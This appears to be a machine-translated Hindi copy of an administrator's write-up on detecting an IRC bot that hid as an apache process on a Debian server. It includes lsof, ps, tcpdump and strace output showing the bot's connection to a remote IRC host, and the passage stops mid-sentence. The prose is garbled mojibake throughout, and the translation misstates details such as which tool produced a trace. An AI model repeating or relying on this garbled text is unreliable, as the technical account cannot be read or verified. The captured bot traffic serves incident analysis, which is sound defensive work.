Phpmyadmin рдХреЗ рдкреБрд░рд╛рдиреЗ рд╕рдВрд╕реНрдХрд░рдгреЛрдВ рдореЗрдВ рд╢реЛрд╖рдг рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдмреЙрдЯ рдкреИрда рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдФрд░ php рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рд╕реБрд░рдХреНрд╖рд╛ рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рдкрд░ рд╕рд┐рдлрд╛рд░рд┐рд╢реЗрдВ

рдореЗрд░реЗ рдкрд╛рд╕ рдкреНрд░рд╢рд╛рд╕рди рдХреЗ рд▓рд┐рдП рдХрдИ рд╕рд░реНрд╡рд░ рд╣реИрдВ рдЬреЛ рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдореЗрд░реА рдкрд░рд┐рдпреЛрдЬрдирд╛рдУрдВ рдХреА рдореЗрдЬрдмрд╛рдиреА рдХрд░рддреЗ рд╣реИрдВ, рд▓реЗрдХрд┐рди рдЙрдирдХреЗ рдЕрд▓рд╛рд╡рд╛, рдореБрдЭреЗ рдмрд╣реБрдд рд╕рд╛рд░реА рд╕рд╛рдЗрдЯреЗрдВ рдЫреЛрдбрд╝рдиреА рдкрдбрд╝реАрдВ - рдХреНрд▓рд╛рдЗрдВрдЯ, рдкрд░рд┐рдЪрд┐рдд, рдкрд░рд┐рдЪрд┐рдд, рдкрд░рд┐рдЪрд┐рдд рдЖрджрд┐ред рдкреНрд░рд╢рд╛рд╕рди рдХреЗ рджреМрд░рд╛рди, рд╡рд┐рднрд┐рдиреНрди рд╕рдорд╕реНрдпрд╛рдУрдВ рдХрд╛ рд╕рд╛рдордирд╛ рдХрд░рдирд╛ рдкрдбрд╝рд╛, рдЗрд╕рд▓рд┐рдП рдХреБрдЫ рдирд┐рдЧрд░рд╛рдиреА рд╕реЗрдЯрд┐рдВрдЧреНрд╕ (рдЬрд╝реИрдмрд┐рдХреНрд╕ рдФрд░ рд╕реНрд╡-рд▓рд┐рдЦрд┐рдд рд╕реНрдХреНрд░рд┐рдкреНрдЯ) рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХрд┐рдП рдЧрдП рдереЗред



рдФрд░ рдХрд▓, рд╕рд░реНрд╡рд░реЛрдВ рдореЗрдВ рд╕реЗ рдПрдХ рдкрд░, рд╕рдХреНрд░рд┐рдп рдХрдиреЗрдХреНрд╢рдиреЛрдВ рдХреА рдЬрд╛рдБрдЪ рдХрд░рдиреЗ рд╡рд╛рд▓реА рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдиреЗ рдЕрд▓рд╛рд░реНрдо рдмрдЬрд╛рдпрд╛: рдкреЛрд░реНрдЯ 433 рдкрд░ рдПрдХ рдЕрдЬреНрдЮрд╛рдд рд╣реЛрд╕реНрдЯ рдХреЗ рд▓рд┐рдП рдПрдХ рдЖрдЙрдЯрдЧреЛрдЗрдВрдЧ рдХрдиреЗрдХреНрд╢рди рд▓рдЧрд╛рддрд╛рд░ рд▓рдЯрдХрд╛ рд╣реБрдЖ рд╣реИ, рдЙрд╕ рд╕рдордп 9 рдШрдВрдЯреЗ рд╕реЗ рдЕрдзрд┐рдХ рд╕рдордп рддрдХ рдЬрдм рдореИрдВрдиреЗ рд╕реЛрдорд╡рд╛рд░ рд╕реБрдмрд╣ рдореЗрд▓ рдкрдврд╝рдиреЗ рдореЗрдВ рдорд╣рд╛рд░рдд рд╣рд╛рд╕рд┐рд▓ рдХреА;)



рдПрдХ рд╕рд░рд╕рд░реА рд╕реНрдХреИрди рдХреЗ рджреМрд░рд╛рди, рдЗрд╕ рд╕рдХреНрд░рд┐рдп рдХрдиреЗрдХреНрд╢рди рдХреЗ рдЕрд▓рд╛рд╡рд╛, рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХреЛрдИ рднреА рд╡рд┐рд╕рдВрдЧрддрд┐ рдФрд░ рдмрд╛рдПрдВ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдУрдВ рдХрд╛ рдкрддрд╛ рдирд╣реАрдВ рд▓рдЧрд╛рдпрд╛ рдЧрдпрд╛ рдерд╛, рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдкрд░ рдЯреНрд░реИрдлрд╝рд┐рдХ рдореЗрдВ рддреЗрдЬ рд╡реГрджреНрдзрд┐ рдХрд╛ рднреА рдкрддрд╛ рдЪрд▓рд╛ рдерд╛, рд▓реЗрдХрд┐рди рдЗрд╕рд╕реЗ рдореБрдЭреЗ рдЖрд╢реНрд╡рд╕реНрдд рдирд╣реАрдВ рд╣реБрдЖ, рдЗрд╕рд▓рд┐рдП рдореБрдЭреЗ рдФрд░ рдЕрдзрд┐рдХ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдкрдбрд╝рд╛ред



рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХреЗ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЗ рдЖрдзрд╛рд░ рдкрд░, рдореБрдЭреЗ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдПрдХ рд╕рдорд╛рди рд╕реБрд░рдХреНрд╖рд╛ рдЫреЗрдж рдореВрд▓ PHP рд╕реЗрдЯрд┐рдВрдЧреНрд╕ рд╡рд╛рд▓реЗ рдЕрдзрд┐рдХрд╛рдВрд╢ рд╕рд░реНрд╡рд░реЛрдВ рдкрд░ рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдореИрдВрдиреЗ рдРрд╕реЗ рдорд╛рдорд▓реЛрдВ рд╕реЗ рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рд╡рд╛рд▓реЗ рдмрд╛рдХреА рд╕рд░реНрд╡рд░реЛрдВ рдХреЗ рдорд╛рд▓рд┐рдХреЛрдВ рдХреА рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рд╣рдм рдкрд░ рдкреЛрд╕реНрдЯ рдХрд░рдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛, рдФрд░ рд╕рд░реНрд╡рд░ рдкрд░ рд╕рдВрдХреНрд░рдордг рдХреЗ рд╕реНрд░реЛрддреЛрдВ рдХреЛ рдЦреЛрдЬрдиреЗ рдХреЗ рддрд░реАрдХреЛрдВ рдХрд╛ рднреА рд╡рд░реНрдгрди рдХрд┐рдпрд╛ред



рд╕рд┐рд╕реНрдЯрдо рдХреЛ рдирд╡реАрдирддрдо рдЕрдкрдбреЗрдЯреНрд╕ рдХреЗ рд╕рд╛рде рдбреЗрдмрд┐рдпрди рд▓реЗрдиреА рджреНрд╡рд╛рд░рд╛ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдЖрдВрд╢рд┐рдХ рд░реВрдк рд╕реЗ рдмреИрдХрдкреЛрд░реНрдЯ рдирд┐рдЪреЛрдбрд╝, рдкреЛрд╕реНрдЯрдлрд┐рдХреНрд╕ + рдбреЛрд╡реЗрдХреЙрдЯ, рдЕрдкрд╛рдЪреЗ 2, рд▓рд╛рдЗрдЯрдЯреИрдк, рдорд╛рдпрд╕реНрдХрд▓, рдкреАрдПрдЪрдкреА, рдкрд░реНрд▓ рдХрд╛рдо рд╕реЗ - рд╕рд╛рдорд╛рдиреНрдп рд░реВрдк рд╕реЗ, рд▓рдЧрднрдЧ рдПрдХ рдмреБрдирд┐рдпрд╛рджреА рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рдиред



рдореЗрд░реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЬрд┐рд╕рдиреЗ рдЗрд╕ рдХрдиреЗрдХреНрд╢рди рдХреА рдЦреЛрдЬ рдХреА рд╣реИ, рд╡рд╣ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрд░рддреА рд╣реИ: рд╣рд░ 30 рдорд┐рдирдЯ рдореЗрдВ рдпрд╣ lsof -nP -i :80,443,25 +c 15



рдЪрд▓рд╛рддрд╛ рд╣реИ lsof -nP -i :80,443,25 +c 15



(рдкреЛрд░реНрдЯреНрд╕ рдкрд░ рд╕рдХреНрд░рд┐рдп рдЖрдЙрдЯрдЧреЛрдЗрдВрдЧ рдХрдиреЗрдХреНрд╢рди рдХреА рдПрдХ рд╕реВрдЪреА 80,443,25), рдЗрд╕рд╕реЗ рдЦреЛрдЬрд╛ рдЧрдпрд╛ рдЙрд╕рдХрд╛ рдЙрдкрд╕рд░реНрдЧ рдореЗрд▓ рд╕рд░реНрд╡рд░ рдХрдЯ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдореЗрд░реА рдХреБрдЫ рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдПрдБ, рдФрд░ рдпрджрд┐, рдЙрдирдХреЗ рдЕрд▓рд╛рд╡рд╛, рдХреЛрдИ рдФрд░ рд╡реНрдпрдХреНрддрд┐ рдХрдиреЗрдХреНрд╢рди рд░рдЦрддрд╛ рд╣реИ, рддреЛ рддреБрд░рдВрдд рдкреИрдирд┐рдХ рдореЛрдб рдЪрд╛рд▓реВ рдХрд░ рджреЗрддрд╛ рд╣реИред



рдЗрд╕ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рдкрд░рд┐рдгрд╛рдореЛрдВ рдХреЗ рдЖрдзрд╛рд░ рдкрд░, рдореБрдЭреЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рд╣реБрдИ:

perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->81.223.126.136:443 (ESTABLISHED)







рдореИрдВ рддреБрд░рдВрдд ssh рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬреБрдбрд╝рд╛, ps aux рдмрдирд╛рдпрд╛, рдЬрд┐рд╕рдиреЗ рдореБрдЭреЗ рдмрд╣реБрдд рдЖрд╢реНрдЪрд░реНрдпрдЪрдХрд┐рдд рдХрд┐рдпрд╛:

UID PID PPID C STIME TTY TIME CMD

www-data 31621 1 0 20:15 ? 00:00:00 /usr/sbin/apache2 -k start






рдпрд╛рдиреА рдкреА рдПрд╕ рдореИрдВрдиреЗ рджрд╛рд╡рд╛ рдХрд┐рдпрд╛ рдХрд┐ рдпрд╣ рдЦрддрд░рдирд╛рдХ рдирд╣реАрдВ рд╣реИ, рд▓реЗрдХрд┐рди рдЕрдкрд╛рдЪреЗред



рдЗрд╕рд▓рд┐рдП, рдореИрдВ рдпрд╣ рдЬрд╛рдирдирд╛ рдЪрд╛рд╣рддрд╛ рдерд╛ рдХрд┐ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рджрд┐рдЦрд╛рдИ рджреЗрдиреЗ рдХреЗ рд▓рд┐рдП, рдЗрд╕ рд╕рдордп рдХреЗ рджреМрд░рд╛рди рд▓реЙрдЧ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЦреЛрдЬ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдФрд░ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдореЗрдВ 30 рдорд┐рдирдЯ рдХрд╛ рдЕрдВрддрд░рд╛рд▓ рд╣реИ, рдЬрд┐рд╕рдХреЗ рд▓рд┐рдП рдореИрдВ рдмрд╣реБрдд рд╕рд╛рд░реЗ рд▓реЙрдЧ рд▓рд┐рдЦрдиреЗ рдореЗрдВ рдХрд╛рдордпрд╛рдм рд░рд╣рд╛ред рдпрд╣ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреНрд░рд╛рд░рдВрдн рддрд┐рдерд┐ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рд╕рдорд╕реНрдпрд╛рдЧреНрд░рд╕реНрдд рдерд╛, ps aux рдХрдорд╛рдВрдб рдиреЗ рдХреЗрд╡рд▓ рд▓реЙрдиреНрдЪ рдХреА рддрд╛рд░реАрдЦ (рдЕрдВрддрд┐рдо рджрд┐рди, 12 рджрд┐рд╕рдВрдмрд░), / proc / рдлрд╝рд╛рдЗрд▓ рдирд┐рд░реНрдорд╛рдг рддрд┐рдерд┐рдпреЛрдВ рдореЗрдВ рджреА рдереА рдФрд░ рдмрд╛рдХреА рдХреА рдЬрд╛рдирдХрд╛рд░реА рдкрд░ рдПрдХ рддреНрд╡рд░рд┐рдд рдирдЬрд╝рд░ рджреНрд╡рд╛рд░рд╛ рдкрд╛рдпрд╛ рдЧрдпрд╛ рдпрд╣ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╕рдВрджреЗрд╢ рдХреЗ рдЕрдВрддрд░рд╛рд▓ рд╕реЗ рдореЗрд▓ рдирд╣реАрдВ рдЦрд╛рддрд╛, рд▓реЗрдХрд┐рди рд╕рдХреНрд░рд┐рдп googling рдХреЗ рдмрд╛рдж рдореИрдВ рдореИрдЬрд┐рдХ рдХрдорд╛рдВрдб рдХреЛ рдЦреЛрдЬрдиреЗ рдФрд░ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд╡рд┐рд╢рд┐рд╖реНрдЯ рдкреНрд░рд╛рд░рдВрдн рд╕рдордп рдХреЛ рдПрдХ рд╕реЗрдХрдВрдб рдХреА рд╕рдЯреАрдХрддрд╛ рдХреЗ рд╕рд╛рде рдЬрд╛рдирдиреЗ рдореЗрдВ рдХрд╛рдордпрд╛рдм рд░рд╣рд╛:

# ps -eo pid,lstart,cmd





рджреВрд╕рд░реЗ рдХреЙрд▓рдо рдореЗрдВ, рдореЗрд░реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ 12.12.2010 23:59:40 рдХреЗ рд▓рд┐рдП, рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╢реБрд░реВ рд╣реЛрдиреЗ рдХрд╛ рд╕рд╣реА рд╕рдордп рдкреНрд░рджрд░реНрд╢рд┐рдд рд╣реЛрддрд╛ рд╣реИред



рдЗрд╕ рд╕рдордп рдХреЗ рджреМрд░рд╛рди рдкреНрд░рддреНрдпреЗрдХ рд╡рд░реНрдЪреБрдЕрд▓ рд╣реЛрд╕реНрдЯ рдХреЗ рд▓реЙрдЧ рдХреА рд╕рд╛рд╡рдзрд╛рдиреАрдкреВрд░реНрд╡рдХ рдЬрд╛рдВрдЪ рдХреА рдЧрдИ, рд╢реВрдиреНрдп рд╕реЗ 5 рдорд┐рдирдЯ рдиреАрдЪреЗ, рдЗрд╕ рдХреНрд╖рдг рд╕реЗ рдореБрдЭреЗ рдХреБрдЫ рднреА рдЕрд╕рд╛рдорд╛рдиреНрдп рдирд╣реАрдВ рдорд┐рд▓рд╛! рдореИрдВрдиреЗ рдПрдХ рдкреНрд░реЛрд╕реЗрд╕ рдЯреНрд░реА рднреА рдмрдирд╛рдпрд╛ рдФрд░ рджреЗрдЦрд╛ рдХрд┐ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд╛ рдХреЛрдИ рдорд╛рддрд╛-рдкрд┐рддрд╛ (pid 0 рд╡рд╛рд▓рд╛ рдорд╛рддрд╛-рдкрд┐рддрд╛) рдирд╣реАрдВ рд╣реИред рдФрд░ рдЖрдИрдкреА рдПрдХреНрд╕реЗрд╕ рдЬрд╣рд╛рдВ рдХрдиреЗрдХреНрд╢рди рд▓рдЯрдХрд╛ рд╣реБрдЖ рд╣реИ (81.223.126.136) рд▓реЙрдЧ рдореЗрдВ рдПрдХ рднреА рдбреЗрдореЙрди рдирд╣реАрдВ рдерд╛ред



рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, perl рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЧреБрдЧрд▓реА рдХрд░рддреЗ рд╣реБрдП, рдореБрдЭреЗ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдЗрд╕рдореЗрдВ рдХрдорд╛рдВрдб рдкреИрд░рд╛рдореАрдЯрд░ рдХреЛ рдХрд┐рд╕реА рдЕрдиреНрдп рдкрд╛рда рдореЗрдВ рдмрджрд▓рдирд╛ рдХрд╛рдлреА рд╕рд░рд▓ рд╣реИ, рдпрд╣ рдЪрд░ $ 0, рдЕрд░реНрдерд╛рддреН рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдПрдХ рдЪрд▓ рд░рд╣реА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ mysqld, init рдпрд╛ рдХрд┐рд╕реА рдЕрдиреНрдп рдбреЗрдореЙрди рдХреЗ рд░реВрдк рдореЗрдВ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред



рдХреБрд▓ рдорд┐рд▓рд╛рдХрд░, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдорд╛рддрд╛-рдкрд┐рддрд╛ рдХреЗ рдмрд┐рдирд╛ рдПрдХ рд╕рдХреНрд░рд┐рдп рдкрд░реНрд▓ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╣реИ, рдЬреЛ 9 рдШрдВрдЯреЗ рд╕реЗ рдЕрдзрд┐рдХ рд╕рдордп рд╕реЗ рд▓рдЯрдХрд╛ рд╣реБрдЖ рд╣реИ рдФрд░ рдХрд╣реАрдВ рд╕реЗ рднреА рдирд╣реАрдВ рдЪрд▓ рд░рд╣рд╛ рд╣реИ, рд╣рд╛рд▓рд╛рдВрдХрд┐ рд╣реЛрд╕реНрдЯрд┐рдВрдЧ рдкрд░, рдореЗрд░реЗ рдкрд╛рд╕ рдХреЗрд╡рд▓ рд╣рд░ рдЬрдЧрд╣ PHP рд╣реИред рдЗрд╕рд▓рд┐рдП, рдпрд╣рд╛рдВ рддрдХ тАЛтАЛрдХрд┐ рдЕрдкрд╛рдЪреЗ рдХреЛ рдлрд┐рд░ рд╕реЗ рд╢реБрд░реВ рдХрд░рдиреЗ рд╕реЗ рдпрд╣ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рдХреНрд░рд┐рдп рд╣реЛ рдЬрд╛рддреА рд╣реИред



рдЕрдЧрд▓рд╛, рдореИрдВрдиреЗ tcpdump рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХреА:

000033 IP [my_ip].55026 > 81.223.126.136.443: . ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>

000172 IP [my_ip].55026 > 81.223.126.136.443: P 1:13(12) ack 1 win 46 <nop,nop,timestamp 575834701 2876573490>

001043 IP 81.223.126.136.443 > [my_ip].54320: . ack 163 win 54 <nop,nop,timestamp 2876573490 575834655>

183151 IP 81.223.126.136.443 > [my_ip].55026: . ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>

000022 IP [my_ip].55026 > 81.223.126.136.443: P 13:145(132) ack 1 win 46 <nop,nop,timestamp 575834747 2876573536>

000005 IP 81.223.126.136.443 > [my_ip].55026: P 1:77(76) ack 13 win 46 <nop,nop,timestamp 2876573536 575834701>

000006 IP [my_ip].55026 > 81.223.126.136.443: . ack 77 win 46 <nop,nop,timestamp 575834747 2876573536>

001213 IP 81.223.126.136.47092 > [my_ip].113: S 4059834353:4059834353(0) win 5840 <mss 1460,sackOK,timestamp 2876573536 0,nop,wscale 7>

000019 IP [my_ip].113 > 81.223.126.136.47092: S 2188075368:2188075368(0) ack 4059834354 win 5792 <mss 1460,sackOK,timestamp 575834748 2876573536,nop,wscale 7>








рдФрд░ рд╡рд╣ htop рдХрдорд╛рдВрдб рдореЗрдВ рд╕реНрдЯреНрд░реЗрд╕ рдХрд░рдиреЗ рдХреА рдХреНрд╖рдорддрд╛ рднреА рдкрд╛рдпрд╛:

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 559974})

read(4, "ERROR :Closing Link: Fasso'[sea.q"..., 4096) = 76

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599998})

read(4, ""..., 4096) = 0

close(4) = 0

socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4

ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)

lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

ioctl(4, SNDCTL_TMR_TIMEBASE or TCGETS, 0x7fff99d8c7a0) = -1 EINVAL (Invalid argument)

lseek(4, 0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

fcntl(4, F_SETFD, FD_CLOEXEC) = 0

connect(4, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("81.223.126.136")}, 16) = 0

getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0

write(4, "NICK Fasso'\n"..., 12) = 12

getsockname(4, {sa_family=AF_INET, sin_port=htons(54087), sin_addr=inet_addr("[my_ip]")}, [149023476701724688]) = 0

write(4, "USER fake [my_ip] 81.223.1"..., 132) = 132

rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

rt_sigaction(SIGCHLD, NULL, {SIG_IGN}, 8) = 0

nanosleep({2, 0}, {2, 0}) = 0

rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 599997})

read(4, "NOTICE AUTH :*** Looking up your "..., 4096) = 113

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 198392})

read(4, "NOTICE AUTH :*** Couldn't look up"..., 4096) = 66

write(4, "PONG :258562266\n"..., 16) = 16

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 413936})

read(4, ":god.undernet.hk 432 * Fasso' :Er"..., 4096) = 50

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

15:59:55 icq.j-im.ru

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 198392})

read(4, "NOTICE AUTH :*** Couldn't look up"..., 4096) = 66

write(4, "PONG :258562266\n"..., 16) = 16

select(8, [4], NULL, NULL, {0, 600000}) = 1 (in [4], left {0, 413936})

read(4, ":god.undernet.hk 432 * Fasso' :Er"..., 4096) = 50

select(8, [4], NULL, NULL, {0, 600000}) = 0 (Timeout)








рдЗрд╕ рдбреЗрдЯрд╛ рд╕реЗ, рдореБрдЭреЗ рдкрддрд╛ рдЪрд▓рд╛ рдХрд┐ рдпрд╣ рдмреЙрдЯ рд╕рдордп-рд╕рдордп рдкрд░ рд╕рд░реНрд╡рд░ рдХреЗ рд╕рд╛рде рд╕реВрдЪрдирд╛ рдХрд╛ рдЖрджрд╛рди-рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ (рд╣рд░ 30-60 рд╕реЗрдХрдВрдб рдореЗрдВ), рдпрд╛рдиреАред рдпрд╣ рд╕рдХреНрд░рд┐рдп рд░реВрдк рд╕реЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдпрд╣ рдмрд╣реБрдд рдЕрдзрд┐рдХ рдЯреНрд░реИрдлрд╝рд┐рдХ рдЙрддреНрдкрдиреНрди рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИ, рдореИрдВрдиреЗ god.undernet.hk рд╣реЛрд╕реНрдЯ рдХреЛ рджреЗрдЦрд╛ рд╣реИ, рд▓реЗрдХрд┐рди рдЗрд╕рдиреЗ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдмреЙрдЯ рдХреЗ рд╕реНрд░реЛрдд рдХреЛ рдЦреЛрдЬрдиреЗ рдореЗрдВ рдореЗрд░реА рдорджрдж рдирд╣реАрдВ рдХреАред



рдлрд┐рд░, рдереЛрдбрд╝рд╛ рдФрд░ рджрд┐рдорд╛рдЧ рдХреЗ рд╕рд╛рде, рдореИрдВрдиреЗ lsof -p 31621 рдХрд┐рдпрд╛ рдФрд░ рдирд┐рдореНрди рдЖрдЙрдЯрдкреБрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд┐рдпрд╛:

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

perl 31621 www-data cwd DIR 9,4 640 2 /tmp

perl 31621 www-data rtd DIR 9,1 4096 2 /

perl 31621 www-data txt REG 9,1 6848 245277 /usr/bin/perl

perl 31621 www-data mem REG 9,1 25536 310438 /usr/lib/perl/5.10.0/auto/Socket/Socket.so

perl 31621 www-data mem REG 9,1 19704 310433 /usr/lib/perl/5.10.0/auto/IO/IO.so

perl 31621 www-data mem REG 9,1 39112 1404408 /lib/libcrypt-2.7.so

perl 31621 www-data mem REG 9,1 1375536 262722 /lib/libc-2.7.so

perl 31621 www-data mem REG 9,1 130114 261372 /lib/libpthread-2.7.so

perl 31621 www-data mem REG 9,1 534736 1404410 /lib/libm-2.7.so

perl 31621 www-data mem REG 9,1 14616 1404409 /lib/libdl-2.7.so

perl 31621 www-data mem REG 9,1 1499352 246277 /usr/lib/libperl.so.5.10.0

perl 31621 www-data mem REG 9,1 119288 262716 /lib/ld-2.7.so

perl 31621 www-data 0u unix 0xffff880080459200 122918994 /tmp/php.socket-1

perl 31621 www-data 1w FIFO 0,8 123556620 pipe

perl 31621 www-data 2w REG 9,1 838 979223 /var/log/lighttpd/error.log

perl 31621 www-data 3u unix 0xffff880020d31500 123039634 /tmp/php.socket-1

perl 31621 www-data 4u IPv4 123556667 TCP [_ip]:59216->136-126-223-81.static.edis.at:https (ESTABLISHED)








рдЗрд╕ рдирд┐рд╖реНрдХрд░реНрд╖ рдиреЗ рдореБрдЭреЗ рд▓рд╛рдЗрдЯрдЯреИрдкреНрдб рд╢рдмреНрдж рдХреА рдЙрдкрд╕реНрдерд┐рддрд┐ рд╕реЗ рдФрд░ рднреА рдЕрдзрд┐рдХ рд╣реИрд░рд╛рди рдХрд░ рджрд┐рдпрд╛ (рдореЗрд░реЗ рдкрд╛рд╕ рд╕рд░реНрд╡рд░ рдкрд░ 2 рдЖрдИрдкреА рд╣реИрдВ, рдЕрдкрд╛рдЪреЗ рдПрдХ рдкрд░ рд▓рдЯрдХрд╛ рд╣реБрдЖ рд╣реИ, рджреВрд╕рд░реЗ рдкрд░ рд▓рд╛рдЗрдЯрдЯреИрдкреНрдб рд╣реИ), рд╣рд╛рд▓рд╛рдВрдХрд┐ рдкреАрдПрд╕ рдореЗрдВ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдПрдХ рдЕрдкрд╛рдЪреЗ рд▓рдЧ рд░рд╣реА рдереА, рдФрд░ рдпрд╣ рдЬрд╛рд╣рд┐рд░рд╛ рддреМрд░ рдкрд░ / tmp рд╕реЗ рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред



рдЖрдЧреЗ рдмреНрд░реЗрдирд╡реЙрд╢ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдореИрдВрдиреЗ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреА рдореЗрдореЛрд░реА рдХреЛ рдбрдВрдк рдХрд░рдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛, рд▓реЗрдХрд┐рди рдкрдврд╝рдиреЗ / рдЦрд░реАрдж // рдореЗрдо рдиреЗ рдорджрдж рдирд╣реАрдВ рдХреАред рд▓реЗрдХрд┐рди gcore рдХрдорд╛рдВрдб (gdb рдкреИрдХреЗрдЬ рд╕реЗ) рдиреЗ рдорджрдж рдХреА - рдЗрд╕рдХреА рдорджрдж рд╕реЗ, рдореИрдВ рдЗрд╕ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреА рдореЗрдореЛрд░реА рдХреЛ 3.2mb рддрдХ рдбрдВрдк рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдерд╛ рдФрд░ рдЗрд╕реЗ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рджреЗрдЦрдирд╛ рд╢реБрд░реВ 